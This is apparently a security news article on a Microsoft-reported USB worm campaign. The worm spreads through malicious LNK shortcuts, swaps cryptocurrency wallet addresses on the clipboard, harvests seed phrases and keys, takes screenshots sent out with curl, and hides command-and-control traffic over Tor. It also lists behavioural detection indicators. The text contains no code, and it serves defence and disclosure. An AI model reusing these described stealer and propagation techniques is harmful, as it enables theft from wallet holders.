“Every half a second, the malware checks the clipboard.” That cadence, Microsoft says, is literal — and it underpins a USB-spread campaign that replaces cryptocurrency wallet addresses, harvests seed phrases and private keys, captures rapid screenshots, and uses the Tor network to hide its command-and-control traffic. The campaign has been active since at least February and pivots on a familiar vector: LNK (Windows shortcut) files on removable drives.
Infection and worm propagation
According to Microsoft, the infection chain begins when a victim opens a malicious LNK file on a USB drive. Additional payloads are staged from a .ONION address. After initial execution, the malware performs a local scan for document files, hides the originals, and replaces them with malicious shortcuts that bear the same names — so attempting to open what looks like a normal document re‑triggers the malware.
The malware also establishes persistence and spread by creating a scheduled task that watches for newly connected USB storage devices. When a removable drive is attached, the worm copies itself to the device and drops more malicious shortcut files, propagating to other machines that subsequently open the infected shortcuts.
Data stealer behavior
Microsoft describes a stealer component that activates after confirming Task Manager is inactive and then establishes communications with the command-and-control (C2) host using a Tor executable named ugate.exe. The clipboard-monitoring routine runs on a half-second loop, checking for a focused set of crypto-related secrets:
- 12-word BIP39 seed phrases
- 24-word BIP39 seed phrases
- Ethereum private keys
- Bitcoin WIF keys
- Bitcoin legacy, P2SH, Bech32, and Taproot wallet addresses
- Tron wallet addresses
- Monero wallet addresses
When replacing clipboard contents, the attackers choose substitute addresses that begin with the same digits or characters so the swapped-in address partially resembles the original and is less likely to be noticed at a quick glance. In addition to clipboard theft, the malware captures five screenshots every ten seconds and exfiltrates them to the C2 using the curl tool.
Microsoft also reports support for remote code execution: a C2 EVAL instruction causes the malware to download JavaScript into a file named “cfile” and execute it on the infected host.
Tor proxy use and exfiltration
The campaign uses Tor both to pull additional payloads (from a .ONION address) and to conceal communications with the C2 via a Tor executable. Microsoft highlights connections to localhost:9050 and other Tor proxy activity as characteristic network artifacts of this operation. The combination of staged .ONION payloads, ugate.exe, and curl-based exfiltration is a consistent element in the observed infections.
Indicators and detection Microsoft recommends
Microsoft emphasizes that the strongest indicators of compromise are behavioral rather than signature-based. They recommend monitoring for process activity on wscript.exe and cscript.exe, unexpected launches of curl, PowerShell, and cmd.exe, and unusual child-process patterns. Network teams should also flag connections to localhost:9050 and other Tor proxy traffic as red flags tied to this campaign.
Complementing that operational guidance, a cited Picus whitepaper notes that “Security teams log 54% of successful attacks and alert on just 14%,” highlighting detection and alerting gaps that allow threats to move through environments unseen unless behavior-focused rules and monitoring are in place.
What this means for technologists, procurement leaders, and end users
- Technologists and security teams will be watching for the behavioral signatures Microsoft names: repeated clipboard checks, rapid screenshot activity sent by curl, unexpected use of ugate.exe and Tor proxy connections, and scheduled tasks that monitor USB events.
- Procurement and enterprise IT leaders will need to account for removable media as an active worm vector because the malware copies itself onto connected USB drives and replaces documents with malicious LNK files.
- End users and custodians of crypto wallets will be keenly exposed: the malware targets seed phrases, private keys, and multiple wallet address formats and purposefully substitutes addresses that resemble originals to evade casual detection.
This campaign combines low‑tech propagation — malicious shortcuts on USB drives — with focused, high-value theft: half‑second clipboard surveillance of seed phrases and keys, screenshot capture, and Tor-protected exfiltration. Microsoft’s guidance centers on behavioral detection: watch the processes, watch for curl and Tor proxy traffic, and watch for scheduled tasks that reproduce the infection across removable media. The record here is specific; the response must be too.
